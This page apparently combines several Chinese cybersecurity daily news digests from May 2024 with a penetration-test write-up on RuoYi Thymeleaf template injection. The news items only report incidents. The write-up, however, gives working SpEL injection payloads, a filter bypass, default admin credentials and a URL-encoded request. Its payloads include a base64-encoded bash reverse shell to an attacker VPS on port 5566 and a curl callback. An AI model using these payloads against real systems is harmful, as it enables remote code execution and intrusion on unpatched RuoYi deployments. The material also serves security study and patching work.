网络安全日报 2024年05月28日
1、Replicate AI服务漏洞可导致暴露客户模型和数据 https://www.wiz.io/blog/wiz-research-discovers-critical-vulnerability-in-replicate 网络安全研究人员发现了人工智能即服务提供商Replicate的一个关键安全漏洞,该漏洞可能允许威胁行为者访问专有的AI模型和敏感信息。利用这一漏洞可能允许未经授权访问所有Replicate平台客户的AI提示和结果。问题的根源在于AI模型通常以允许任意代码执行的格式打包,攻击者可以利用这种格式通过恶意模型执行跨租户攻击。Replicate使用一个名为Cog的开源工具来容器化和打包机器学习模型,这些模型可以在自托管环境中或部署到Re 2、攻击者在针对MITRE网络攻击中创建了恶意虚拟机来逃避检测 https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b MITRE公司透露,在2023年12月底针对这家非营利公司的网络攻击中,黑客利用Ivanti Connect Secure (ICS)的零日漏洞,通过在其VMware环境中创建恶意虚拟机来进行攻击。对手在VMware环境中创建了自己的恶意虚拟机,利用了被攻陷的vCenter Server访问权限。攻击者在vCenter Server的Tomcat服务器下编写并部署了一个名为 3、研究人员披露假冒杀软网站传播安卓和Windows恶意软件 https://www.trellix.com/blogs/research/a-catalog-of-hazardous-av-sites-a-tale-of-malware-hosting/ 威胁行为者被发现利用假冒合法杀毒解决方案(如Avast、Bitdefender和Malwarebytes)的虚假网站传播恶意软件,这些恶意软件能够窃取安卓和Windows设备上的敏感信息。通过看似合法的网站托管恶意软件对普通消费者具有侵害性,尤其是那些希望保护设备免受网络攻击的人。这些网站包括:avast-securedownload[.]com,用于以Android软件包文件形式("Avast.a 4、谷歌针对Chrome浏览器的零日漏洞推出了修复程序 https://thehackernews.com/2024/05/google-detects-4th-chrome-zero-day-in.html 谷歌在周四推出了修复程序,以解决其Chrome浏览器中的一个高严重性安全漏洞,该漏洞已在野外被利用。该漏洞被分配了CVE标识符CVE-2024-5274,涉及V8 JavaScript和WebAssembly引擎中的类型混淆错误。该漏洞于2024年5月20日报告。类型混淆漏洞发生在程序试图以不兼容的类型访问资源时。这可能会导致严重后果,因为它允许威胁行为者执行越界内存访问、引发崩溃以及执行任意代码。这是自本月初以来谷歌修补的第四个零日漏洞, 5、Windows 24H2版本将移除Cortana和WordPad应用 https://blogs.windows.com/windows-insider/2024/05/22/releasing-windows-11-version-24h2-to-the-release-preview-channel/ 微软表示,系统升级到即将发布的Windows 11 24H2版本后,Cortana、Tips和WordPad应用程序将自动移除。这一消息在周四的博客中公布,宣布Windows 11版本24H2(Build 26100.712)现在可供Release Preview Channel的内部人员使用。公司在10月初发布的Canary Channel内部版本2596 6、新的ATM恶意软件家族出现,称能够入侵欧洲 99% 的设备 https://securityaffairs.com/163732/malware/eu-atm-malware.html 一名威胁者正在宣传一种新的 ATM 恶意软件家族,声称能够入侵欧洲 99% 的设备。该威胁者以 30,000 美元的价格出售该恶意软件,他声称“欧盟 ATM 恶意软件”是从头设计的,还可以攻击 全球约 60% 的 ATM。 7、思科 FIREPOWER 管理中心存在高危漏洞 https://securityaffairs.com/163718/security/a-high-severity-vulnerability-affects-cisco-firepower-management-center.html 思科解决了 Firepower 管理中心 (FMC) 软件基于 Web 的管理界面中的 SQL 注入漏洞。 8、网络犯罪分子利用云存储进行短信钓鱼诈骗 https://www.infosecurity-magazine.com/news/cloud-storage-exploited-sms/ 安全研究人员揭露了一系列利用 Amazon S3、Google Cloud Storage、Backblaze B2 和 IBM Cloud Object Storage 等云存储服务的犯罪活动。这些活动由未具名的威胁行为者推动,旨在将用户重定向到恶意网站,然后使用短信窃取他们的信息。通过利用云存储平台托管嵌入垃圾邮件 URL 的静态网站,攻击者可以使其消息看起来合法并避开常见的安全措施。 9、《2024年DDoS趋势报告》:DDoS攻击规模飙升233.33% https://www.nexusguard.com/file/nexusguard-ddos-trend-report-2024 Nexusguard 《2024年度DDoS趋势报告》提供了一份深刻的分析,显示攻击频率下降了54.74%,但平均攻击规模却显著上升了233.33%,这表明攻击的破坏性越来越大。尽管基于UDP、TCP、放大(Amplification)和应用层攻击的流行率有所下降,但2023年最大的攻击达到了700Gbps,比上年增长了93.42%。 10、工信部印发《工业和信息化领域数据安全风险评估实施细则(试行)》 https://www.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2024/art_414d957b786c4a549c37acd5c6e80c71.html 为引导工业和信息化领域数据处理者规范开展数据安全风险评估工作,提升数据安全管理水平,维护国家安全和发展利益,保障国家关键信息基础设施的安全稳定,推动数字经济的健康发展,工业和信息化部根据《中华人民共和国数据安全法》《中华人民共和国网络安全法》等法律,按照《工业和信息化领域数据安全管理办法(试行)》有关要求,印发了《工业和信息化领域数据安全风险评估实施细则(试行)》(以下简称《细则》),自 2024 年 6 月 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记一次攻防演练中的若依(thymeleaf 模板注入)getshell
记一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析。 0x01 漏洞发现 首先,我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的网站。 这样子可以快速的定位到你所要测试的漏洞资产。 1、推荐三个比较实用的搜索引擎: 奇安信-鹰图平台:https://hunter.qianxin.com/ 360-quake: https://quake.360.net/ fofa: https://fofa.info/ 搜索语法:domain="二级域名" 2、通过一番搜索查找翻阅,幸运女神光顾~~~。 通过搜索引擎搜索到包含目标的二级域名找到关于目标的的一个三级域名,而且还是漏洞百出的若依系统。 经典:你若不离不弃,我必生死相依 基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖 0x02 漏洞分析 Thymeleaf模板注入漏洞简介 Thymeleaf模板注入形成原因,简单来说,在Thymeleaf模板文件中使用th:fragment、 , th:text 这类标签属性包含的内容会被渲染处理。并且在Thymeleaf渲染过程中使用 ${...} 或其他表达式中时内容会被Thymeleaf EL引擎执行。因此我们将攻击语句插入到 ${...} 表达式中,会触发Thymeleaf模板注入漏洞。如果带有 @ResponseBody 注解和 @RestController 注解则不能触发模板注入漏洞。因为@ResponseBody 和 @RestController 不会进行View解析而是直接返回。所以这同样是修复方式。 漏洞点 Server-Side Template Injection简称SSTI,也就是服务器端模板注入。 我们在审计模板注入(SSTI)漏洞时,主要查看所使用的模板引擎是否有接受用户输入的地方。主要关注xxxController层代码。在Controller层,我们关注两点:1、URL路径可控。2、return内容可控。所谓可控,也就是接受输入。 1、URL路径可控 @RequestMapping("/hello") public class HelloController {  @RequestMapping("/whoami/{name}/{sex}")  public String hello(@PathVariable("name") String name, @PathVariable("sex") String sex){    return "Hello" + name + sex; } } return内容可控 @PostMapping("/getNames") public String getCacheNames(String fragment, ModelMap mmap) {  mmap.put("cacheNames", cacheService.getCacheNames());  return prefix + "/cache::" + fragment; } return内容可控: \_\_${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("whoami").getI nputStream()).next()}\_\_::.x URL路径可控: \_\_${T(java.lang.Runtime).getRuntime().exec("touch test")}\_\_::.x 2、Ruoyi使用了thymeleaf-spring5,其中四个接口方法中设置了片段选择器: http://xxxxxx/monitor/cache/getNameshttp://xxxxxx/monitor/cache/getKeyshttp://xxxxxx/monitor/cache/getValuehttp://xxxxxx/demo/form/localrefresh/task通过这四段接口,可以指定任意fragment,以/monitor/cache/getNames接口为例,controller代码如下: @PostMapping("/getNames") public String getCacheNames(String fragment, ModelMap mmap) {    mmap.put("cacheNames", cacheService.getCacheNames());    return prefix + "/cache::" + fragment; } 简单理解:接收到 fragment 后,在return处进行了模板路径拼接。根据代码我们知道根路径为 /monitor/cache ,各个接口路径分别为 /getNames , /getKeys , /getValue ,请求参数均为fragment 。 这四段接口方法中,都使用了thymeleaf的语法: "/xxx::" + fragment; 我们构造fragment的值为: url编码: %24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%64%6e%73%6c%6f%67%30%40%22%29%7d                    ↓ ${T (java.lang.Runtime).getRuntime().exec("curl dnslog地址")} 当我们构造的模板片段被thymeleaf解析时,thymeleaf会将识别出fragment为SpringEL表达式。不管是?fragment=header(payload)还是?fragment=payload 但是,在执行SpringEL表达式之前,thymeleaf会去检查参数值中是否使用了"T(SomeClass)"或者"new SomeClass" 这个检查方法其实可以绕过,SpringEL表达式支持"T (SomeClass)"这样的语法,因此我们只要在T与恶意Class之间加个空格,就既可以绕过thymeleaf的检测规则,又可以执行SpringEL表达式。 因此payload中T与恶意Class之间含有空格,不论是空格或者制表符都可以绕过检测。 漏洞影响:RuoYi <= v4.7.1 0x03 开始战斗 1、回到之前的若依登录框,若依的管理系统肯定要试试看弱口令啦,用户admin,密码admin123。 非常nice,弱口令yyds,登录进入若依系统后台。 经过一番测试,后台定时任务执行不了命令,反弹shell不成功,更换了几个不同的payload都没效果,太菜了,咱也不知道为什么,其他的常见的漏洞任意文件读取、SQL注入、未授权访问啥的都没有,所以才会来测试一番Thymeleaf模板注入远程命令执行。 这四个接口路径都可以访问,我们使用第一个接口路径进行测试。 /monitor/cache/getNames /monitor/cache/getKeys /monitor/cache/getValue /demo/form/localrefresh/task 2、在若依管理系统后台直接访问/monitor/cache/getNames接口路径,使用burp suite拦截访问/monitor/cache/getNames路径的数据包。 访问/monitor/cache/getNames 使用burp suite拦截数据包 使用burp suite上自带的编码工具,使用base64编码反弹shell命令 /bin/bash -i >& /dev/tcp/vps IP/5566 0>&1 构造fragment的值,把上面使用base64的编码放入下面的payload编码成url编码 ${T (java.lang.Runtime).getRuntime().exec("bash \-c {echo,L2Jpbi9iYXNooC1poD4moC9kZXYvdGNwL3ZwcyBJUC81NTY2oDA+JjE=}|{base64,-d}|{bash,-i}")} 把前面拦截到的访问/monitor/cache/getNames路径的数据包更改请求方式为POST,更改完请求方式后在访问路径后面拼接上我们刚刚经过url编码构造fragment的值。 /monitor/cache/getNames?fragment=%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%62%61%73%68%a0%5c%2d%63%20%7b%65%63%68%6f%2c%4c%32%4a%70%62%69%39%69%59%58%4e%6f%6f%43%31%70%6f%44%34%6d%6f%43%39%6b%5a%58%59%76%64%47%4 3、在vps上面使用nc监听5566端口,接收反弹shell。 把刚刚更改了请求方式为POST,拼接上url编码构造fragment的值的数据包发送出去,可以发到重发器多发几遍。 返回包返回状态200,应该是执行成功了。 回到vps查看监听状态,nice!!!成功,拿下拿下。 漏洞挖掘的过程中要有耐心、细心,把能试的漏洞都试一试,反正试一试又不要钱,说不定就getshell了呢。。。。。。 0x04 修复建议 把若依系统更新到最新版本。
网络安全日报 2024年05月27日
1、攻击者利用Foxit PDF 阅读器漏洞传播多种恶意软件 https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ 多个威胁行为者正在利用Foxit PDF Reader中的设计漏洞,传播各种恶意软件,如Agent Tesla、AsyncRAT、DCRat、NanoCore RAT、NjRAT、Pony、Remcos RAT和XWorm。该漏洞触发的安全警告可能会欺骗毫无防备的用户执行有害命令。值得注意的是,Adobe Acrobat Reader,更常见于沙箱或杀毒解决方案中,不易受此特定漏洞的影响,这也导致了该活动的低检测率。当用户被要求在启用某些功能之 2、GhostEngine挖矿利用漏洞驱动程序关闭EDR安全功能 https://thehackernews.com/2024/05/ghostengine-exploits-vulnerable-drivers.html 恶意加密挖矿活动代号'REF4578',部署名为GhostEngine的恶意负载,利用漏洞驱动程序关闭安全产品并部署XMRig矿工。安天的研究人员和国外厂商在分别发布的报告中指出了这些加密挖矿攻击的非同寻常的复杂性,并分享了检测规则以帮助防御者识别和阻止这些攻击。两份报告均未将该活动归因于已知的威胁行为者,也未分享有关目标或受害者的详细信息,因此该活动的来源和范围仍不明。 3、 LockBit声称针对加拿大连锁药店London Drugs进行了攻击 https://www.bleepingcomputer.com/news/security/lockbit-says-they-stole-data-in-london-drugs-ransomware-attack/ LockBit勒索软件团伙声称他们是四月对加拿大连锁药店London Drugs进行网络攻击的幕后黑手,并威胁将在谈判失败后公开被盗数据。London Drugs在阿尔伯塔省、萨斯喀彻温省、马尼托巴省和不列颠哥伦比亚省的80多家门店中拥有超过9000名员工,提供医疗保健和药房服务。4月28日的一次网络攻击迫使London Drugs关闭了整个加拿大西部的所有零售店。该公司表 4、Atlassian Bitbucket工件文件可能泄露明文身份验证密钥 https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets 研究人员发现攻击者利用在Atlassian Bitbucket工件对象中以明文形式泄露的身份验证密钥入侵AWS账户。研究人员在调查最近曝光的Amazon Web Services (AWS)机密时发现了这个问题,威胁行为者利用这些机密获得了对AWS的访问权限。尽管这个问题是在调查背景下发现的,但它说明了以前被认为是安全的数据如何以明文形式泄露到公共存储库中。Bitbucket是由Atlassian运营的一个与G 5、OmniVision在2023年勒索软件攻击后披露数据泄露事件 https://www.documentcloud.org/documents/24674250-omnivision 总部位于加利福尼亚的成像传感器制造商OmniVision警告称,去年该公司遭遇了Cactus勒索软件攻击,导致数据泄露。OmniVision是中国韦尔半导体的子公司,设计和开发用于智能手机、笔记本电脑、网络摄像头、汽车、医疗成像系统等领域的成像传感器。2023年,该公司拥有2200名员工,年收入达14亿美元。上周五,OmniVision通知了加利福尼亚州当局,称该公司在2023年9月4日至9月30日期间发生了一起安全漏洞事件,当时其系统被勒索软件加密。“2023年9月30日 6、勒索软件攻击遵循既定的模式利用VMware ESXi漏洞 https://www.sygnia.co/blog/esxi-ransomware-attacks/ 无论部署了何种文件加密恶意软件,针对VMware ESXi基础设施的勒索软件攻击都遵循既定模式。虚拟化平台是组织IT基础设施的核心组成部分,但它们往往存在固有的错误配置和漏洞,使其成为威胁行为者滥用的有利且高效的目标。研究人员通过其涉及各种勒索软件家族(如LockBit、HelloKitty、BlackMatter、RedAlert (N13V)、Scattered Spider、Akira、Cactus、BlackCat和Cheerscrypt)的事件响应工作发现,对虚拟化环境的攻击遵循 7、CISA警告Apache Flink安全漏洞正在被积极利用 https://www.cisa.gov/news-events/alerts/2024/05/23/cisa-adds-one-known-exploited-vulnerability-catalog 美国网络安全和基础设施安全局(CISA)周四将影响Apache Flink的安全漏洞添加到其已知被利用漏洞(KEV)目录中,引用了活跃利用的证据。该漏洞被追踪为CVE-2020-17519,涉及不当访问控制,可能允许攻击者通过JobManager的REST接口读取本地文件系统上的任何文件。这也意味着远程未经身份验证的攻击者可以发送精心构造的目录遍历请求,从而允许未经授权访问敏感信息。该漏洞 8、 Windows 11的Recall AI功能将记录用户在PC上的所有活动 https://blogs.microsoft.com/blog/2024/05/20/introducing-copilot-pcs/ 微软宣布在Windows 11中推出一项名为“Recall”的新AI功能,该功能记录用户在PC上的所有活动,并允许用户搜索历史活动。Recall就像你的PC的照片记忆,让用户能够通过使用母语查询的方式,有条理地访问用户在电脑上看到或做过的所有事情。通过Recall,用户可以滚动浏览你的时间轴,找到用户曾打开过的任何应用程序、网站或文档的内容。该功能利用快照根据识别到的内容建议操作,使用户能够轻松返回到Outlook中的特定电子邮件或Teams中的正确聊天记 9、Ivanti修补了Endpoint Manager中的关键远程代码执行漏洞 https://thehackernews.com/2024/05/ivanti-patches-critical-remote-code.html Ivanti在周二推出了多项修复,以解决Endpoint Manager (EPM)中可能在特定情况下被利用实现远程代码执行的多个关键安全漏洞。在这10个漏洞中,有6个漏洞(CVE-2024-29822至CVE-2024-29827,CVSS评分:9.6)涉及SQL注入漏洞,允许同一网络中的未经身份验证的攻击者执行任意代码。剩余的4个漏洞(CVE-2024-29828、CVE-2024-29829、CVE-2024-29830和CVE-2024 10、JAVS法庭录音软件在供应链攻击中被植入后门 https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/ 攻击者在广泛使用的Justice AV Solutions (JAVS)法庭视频录音软件的安装程序中植入了后门恶意软件,能够接管受感染的系统。开发该软件的公司JAVS表示,这款数字录音工具目前在全球众多法庭、律师事务所、监狱和政府机构中已有超过10000次安装。JAVS已从其官方网站上移除受感染版本,并表示包 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月24日
1、llama_cpp_python Python包存在严重漏洞 https://checkmarx.com/blog/llama-drama-critical-vulnerability-cve-2024-34359-threatening-your-software-supply-chain/ 研究人员在llama_cpp_python Python包中披露了一个关键的安全漏洞,可能被威胁行为者利用来实现任意代码执行。该漏洞编号为CVE-2024-34359(CVSS评分:9.7),由软件供应链安全公司Checkmarx命名为Llama Drama。如果被利用,它可能允许攻击者在您的系统上执行任意代码,从而破坏数据和操作。llama_cpp_pytho 2、Windows 11将淘汰NTLM并新增AI驱动的应用控制和安全防护 https://www.microsoft.com/en-us/security/blog/2024/05/20/new-windows-11-features-strengthen-security-to-address-evolving-cyberthreat-landscape/ 微软在周一确认计划在今年下半年逐步淘汰Windows 11中的NT LAN Manager(NTLM),并宣布了一系列新的安全措施,以增强广泛使用的桌面操作系统的安全性。“淘汰NTLM一直是我们的安全社区的巨大需求,因为它将加强用户身份验证,计划于2024年下半年实施,”这家科技巨头表示。微软最初在2023年 3、与伊朗相关的攻击者对阿尔巴尼亚和以色列进行了网络攻击 https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/ 一个与伊朗情报和安全部(MOIS)有关的威胁行为者被认为是针对阿尔巴尼亚和以色列进行破坏性擦除攻击的幕后黑手,分别以“Homeland Justice”和“Karma”的名义进行活动。研究人员将这一活动追踪为“Void Manticore”。Void Manticore和Scarred Manticore的目标之间有明显的重叠,表明这两个组织在决定对Scarred Manticor 4、严重 SQL 注入漏洞影响 Ivanti Endpoint Manager https://securityaffairs.com/163587/security/ivanti-endpoint-manager-critical-sql-injection.html Ivanti 修复了 Endpoint Manager (EPM) 中的多个漏洞,包括远程代码执行漏洞。Ivanti 本周推出了安全补丁,以修复多个严重漏洞。 5、CISA 警告 Apache Flink 安全漏洞可能被利用 https://thehackernews.com/2024/05/cisa-warns-of-actively-exploited-apache.html 美国网络安全和基础设施安全局 (CISA) 周四将影响开源统一流处理和批处理框架 Apache Flink 的安全漏洞添加到已知利用漏洞 ( KEV ) 目录中,并指出有证据表明该漏洞被主动利用。 6、苹果 Wi-Fi 定位系统被滥用来追踪全球各地的人们 https://www.theregister.com/2024/05/23/apple_wifi_positioning_system/ 深入学者认为,苹果的Wi-Fi定位系统(WPS)可能被滥用,从而造成全球隐私噩梦。 7、逾 20 万个Confluence 数据中心实例面临远程代码执行风险 https://www.freebuf.com/news/401663.html 近日,数十万个可能存在漏洞的 Atlassian Confluence Data Center 和 Confluence Server 实例暴露在互联网山,威胁攻击者能够在这些实例上远程运行任意代码。研究人员在两款 Atlassian 产品中发现了一个安全漏洞 CVE-2024-21683( CVSS 得分为 8.3),经过仔细分析得出,威胁攻击者可以对受影响的系统实施远程代码执行 (RCE) 攻击。 8、微软计划于 2024 年下半年逐步弃用 VBScript https://www.freebuf.com/news/401655.html 近日微软宣布将于 2024 年下半年开始弃用 VBScript,可能会先把该功能列为按需功能,后面会逐步删除。 9、四部门制定《互联网政务应用安全管理规定》 https://www.freebuf.com/news/401719.html  由中央网络安全和信息化委员会办公室、中央机构编制委员会办公室、工业和信息化部、公安部制定的《互联网政务应用安全管理规定》近日印发。规定要求,建设运行互联网政务应用应当依照有关法律、行政法规的规定以及国家标准的强制性要求,采取技术措施和其他必要措施,防范内容篡改、攻击致瘫、数据窃取等风险,保障互联网政务应用安全稳定运行和数据安全。 10、微软必应全球宕机波及 ChatGPT、Copilot、DuckDuckGo等服务 https://www.ithome.com/0/770/260.htm 微软全球必应搜索服务出现宕机事件,且持续了 1 天时间,但影响并不仅仅局限于必应搜索网站,很多调用必应搜索 API 的服务也因此受到影响。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月23日
1、研究人员披露CLOUD#REVERSER恶意攻击活动 https://www.securonix.com/blog/analysis-and-detection-of-cloudreverser-an-attack-involving-threat-actors-compromising-systems-using-a-sophisticated-cloud-based-malware/ 研究人员发现了一项名为CLOUD#REVERSER的新攻击活动,该活动利用Google Drive和Dropbox等合法的云存储服务来放置恶意负载。CLOUD#REVERSER中的VBScript和PowerShell脚本本质上涉及使用Google Drive 2、攻击者利用MS Exchange Server漏洞部署恶意键盘记录器 https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/positive-technologies-detects-a-series-of-attacks-via-microsoft-exchange-server/ 一个未知的威胁行为者正在利用Microsoft Exchange Server中的已知安全漏洞,部署键盘记录器恶意软件,攻击目标是非洲和中东的实体。研究人员已经发现了超过30个受害者,涵盖政府机构、银行、IT公司和教育机构。首次入侵可追溯到2021年。该键盘记录器将账户凭证收集到一个可以通过互联 3、QNAP公司修复了NAS设备QTS和QuTS Hero中的新漏洞 https://www.qnap.com/en/security-advisory/qsa-24-23 QNAP公司已经发布了一系列中等严重性漏洞的修复补丁,这些漏洞影响了QTS和QuTS hero,其中一些可能被利用在其网络附加存储(NAS)设备上执行代码。这些问题影响QTS 5.1.x和QuTS hero h5.1.x,CVE-2024-21902:一个关键资源权限分配不当的漏洞,可能允许经过身份验证的用户通过网络读取或修改资源。CVE-2024-27127:一个双重释放漏洞,可能允许经过身份验证的用户通过网络执行任意代码。CVE-2024-27128、CVE-2024-27129和CV 4、Veeam存在严重漏洞可允许攻击者身份验证绕过 https://www.veeam.com/kb4581 研究人员发现了一个关键的安全漏洞,可能允许对手绕过身份验证保护。该漏洞编号为CVE-2024-29849(CVSS评分:9.8),可能允许未经身份验证的攻击者以任何用户身份登录Veeam Backup Enterprise Manager的Web界面。该公司还披露了影响同一产品的其他三个缺陷:CVE-2024-29850(CVSS评分:8.8),允许通过NTLM中继进行账户接管。CVE-2024-29851(CVSS评分:7.2),允许特权用户窃取Veeam Backup Enterprise Manager服务账户的NTLM哈希值, 5、严重GitHub Enterprise Server身份验证绕过漏洞已被修复 https://www.securityweek.com/critical-authentication-bypass-resolved-in-github-enterprise-server/ GitHub Enterprise Server 中的严重漏洞允许未经身份验证的攻击者获取管理权限。 6、英国研究人员发现人工智能聊天机器人极易越狱 https://www.infosecurity-magazine.com/news/ai-chatbots-vulnerable-jailbreaks/ 英国人工智能安全研究所 (AISI) 的研究人员发现,四种最常用的生成式人工智能聊天机器人很容易受到基本的越狱攻击。在英国和韩国于 5 月 21 日至 22 日联合主办的 2024 年人工智能首尔峰会之前发布的 2024 年 5 月更新中,英国 AISI 分享了对五个领先的人工智能聊天机器人进行的一系列测试的结果。 7、中国电信设备(华为和中兴)可能在德国被禁止 https://www.theregister.com/2024/05/20/huawei_germany_ban/ 出于国家安全考虑,德国正在考虑禁止在其 5G 网络中使用华为和中兴设备,尽管业界反对,而且取消中国制造的技术可能会带来高昂的成本。 8、美国证券机构新规!发现数据违规后需在 30 天内披露 https://www.secrss.com/articles/66279 SEC 通过修正案,对管理消费者个人信息处理工作的《S-P 条例》进行了修改。修正案要求,机构在发现未经授权的网络访问或客户数据使用后,必须“尽快在不超过 30 天”内通知受影响个人。 9、工信部:调用安卓FileProvider组件的移动应用存在高危漏洞 https://www.secrss.com/articles/66240 工业和信息化部网络安全威胁和漏洞信息共享平台监测发现,多个调用安卓操作系统 FileProvider 组件的移动互联网应用程序(以下简称APP)存在路径遍历高危漏洞,可被恶意利用实施网络攻击。 10、特斯拉汽车的开源数据记录器 TeslaLogger 中发现漏洞 https://cybersecuritynews.com/30-tesla-cars-hacked/ 一名安全研究人员发现 TeslaLogger(用于从 Tesla 车辆收集数据的第三方软件)中存在一个漏洞,该漏洞利用不安全的默认设置,可被利用来获得对 TeslaLogger 实例的未经授权的访问。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月22日
1、电子处方提供商MediSecure遭遇大规模勒索软件导致数据泄露 https://www.medisecure.com.au/ 澳大利亚的电子处方提供商MediSecure由于疑似来自第三方供应商的勒索软件攻击,已经关闭了其网站和电话线。该事件影响了个人和健康信息,但目前影响程度尚不清楚。MediSecure自2009年以来一直运营,为医疗专业人士提供管理和分发药物的数字工具。公司通过其私人和州支持的eRx系统发出了数百万份电子处方。直到2009年11月,它是澳大利亚仅有的两个无纸化处方网络之一。今天,该公司宣布其受到服务供应商之一的网络安全事件的间接影响,导致数据泄露。“MediSecure已确定一起网络安全事件,影响了个人和健康信息。我们已采取紧急措施 2、大型保险公司WebTPA遭遇数据泄露影响240万保单持有人 https://www.bleepingcomputer.com/news/security/webtpa-data-breach-impacts-24-million-insurance-policyholders/ 美国卫生与公众服务部(HHS)指出,本月早些时候披露的WebTPA雇主服务(WebTPA)数据泄露事件影响了近250万人。部分受影响的人是大型保险公司(如The Hartford、Transamerica和Gerber Life Insurance)的客户。WebTPA是GuideWell Mutual Holding Corporation的子公司,是一家第三方管理公司(T 3、微软将于7月开始实施Azure多重身份验证 https://www.bleepingcomputer.com/news/microsoft/microsoft-will-start-enforcing-azure-multi-factor-authentication-MFA-in-july-2024/ 从七月开始,微软将逐步对所有登录Azure进行资源管理的用户强制实施多因素认证(MFA)。在首先完成对Azure门户的推广之后,MFA的强制实施将会在CLI、PowerShell和Terraform中进行类似的推广。客户还将通过电子邮件和官方通知收到有关MFA强制实施的更多信息。服务主体、托管身份、工作负载身份和用于自动化的类似基于令 4、QNAP 紧急修补 NAS 设备中的代码执行漏洞 https://www.securityweek.com/qnap-rushes-patch-for-code-execution-flaw-in-nas-devices/ 总部位于台湾的 QNAP Systems 周二发布了针对其网络附加存储 (NAS) 设备中多个漏洞的补丁,其中包括上周发布概念验证代码的一个漏洞。 5、Zoom 为产品添加后量子端到端加密 https://www.securityweek.com/zoom-adding-post-quantum-end-to-end-encryption-to-products/ 视频通信巨头 Zoom 周二宣布,Zoom Workplace 已添加后量子端到端加密 (E2EE)。该功能利用Kyber 768密钥封装方法,目前在全球范围内的 Zoom Meetings 中可用,Zoom Phone 和 Zoom Rooms 也即将推出。 6、主流云、科技公司使用的Fluent Bit 实用程序中发现严重漏洞 https://www.securityweek.com/vulnerability-found-in-fluent-bit-utility-used-by-major-cloud-tech-companies/ 据网络安全公司 Tenable 称,Fluent Bit 是多家大公司使用的流行日志记录实用程序,受到一个严重漏洞的影响,该漏洞可能导致拒绝服务 (DoS) 攻击、信息泄露,甚至可能导致远程代码执行 (RCE)。 7、BLACKBASTA勒索软件称入侵了美国最大石油分销商之一 ATLAS https://securityaffairs.com/163489/cyber-crime/blackbasta-claims-atlas-hack.html Blackbasta 勒索组织声称入侵了美国最大的全国燃料分销商之一阿特拉斯 (Atlas)。该团伙声称从 ATLAS 窃取了 730GB 数据,包括公司数据:账户、人力资源、财务、高管、部门数据以及用户和员工数据。 8、GitHub Enterprise Server 严重漏洞允许绕过身份验证 https://thehackernews.com/2024/05/critical-github-enterprise-server-flaw.html GitHub 已推出修复程序,以解决 GitHub Enterprise Server (GHES) 中的最严重缺陷,该缺陷可能允许攻击者绕过身份验证保护。该问题被追踪为CVE-2024-4985(CVSS 评分:10.0),可能允许对实例进行未经授权的访问,而无需事先进行身份验证。 9、 国内多地 3 万余条新生儿信息被倒卖,背后非法产业链曝光 https://www.secrss.com/articles/66247 近日,杭州互联网法院审理了一起个人信息保护民事公益诉讼案,该案涉及的新生儿个人信息达 3 万余条。 10、Grandoreiro 木马重浮水面,全球 1500 多家组织遭殃 https://thehackernews.com/2024/05/grandoreiro-banking-trojan-resurfaces.html 研究人员发现基于 Windows 的 Grandoreiro 特洛伊银行木马再次重新浮出水面。据悉,这是该木马在 2024 年 3 月份之后,又一次在全球范围内发动攻击。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
2024年网络安全高级研修班·第二期 邀请函
